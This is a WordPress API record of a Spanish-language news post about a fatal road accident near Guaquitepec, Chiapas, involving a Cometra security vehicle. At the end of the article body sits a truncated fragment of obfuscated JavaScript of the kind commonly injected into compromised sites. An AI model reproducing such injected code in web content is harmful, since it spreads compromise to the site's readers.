{"id":12384,"date":"2023-11-01T10:22:33","date_gmt":"2023-11-01T10:22:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12384"},"modified":"2023-11-01T10:22:34","modified_gmt":"2023-11-01T10:22:34","slug":"un-muerto-y-un-herido-tras-accidente-en-carretera-a-guaquitepec","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12384","title":{"rendered":"Un muerto y un herido tras accidente en carretera a Guaquitepec"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1698833954750-768x1024.jpg\" alt=\"\" class=\"wp-image-12385\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1698833954750-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1698833954750-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1698833954750.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<br>31 de Octubre del 2023. San Crist\u00f3bal de Las Casas.- Un menor de edad perdi\u00f3 la vida, mineras que un adulto se encuentra de gravedad, luego de suscitarse un accidente carretero sobre el Tramo de San Juan Cancuc a Guaquitepec, d\u00f3nde se vio involucrado el conductor de la empresa de valores Cometra.<\/p>\n\n\n\n<p>De acuerdo a los reportes, las personas fueron atropelladas, ya que el conductor de la Unidad, perdi\u00f3 el control tres una zona de lodo y dif\u00edcil tr\u00e1nsito.<\/p>\n\n\n\n<p>Ante el lamentable hecho, los pobladores cerraron el tr\u00e1nsito vehicular, la cual era la unica v\u00eda de San Crist\u00f3bal a Ocosingo.<\/p>\n\n\n\n<p>Esperan que los encargados de la empresa acudan y lleguen a buenos t\u00e9rminos para liberar a los dos retenidos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal31 de Octubre del 2023. San Crist\u00f3bal de Las Casas.- Un menor de edad perdi\u00f3 la vida, mineras que un adulto se encuentra de gravedad, luego de suscitarse un accidente carretero sobre el Tramo de San Juan Cancuc a Guaquitepec, d\u00f3nde se vio involucrado el conductor de la empresa de valores Cometra. De &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12385,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12384","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12384"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12384\/revisions"}],"predecessor-version":[{"id":12386,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12384\/revisions\/12386"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12385"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}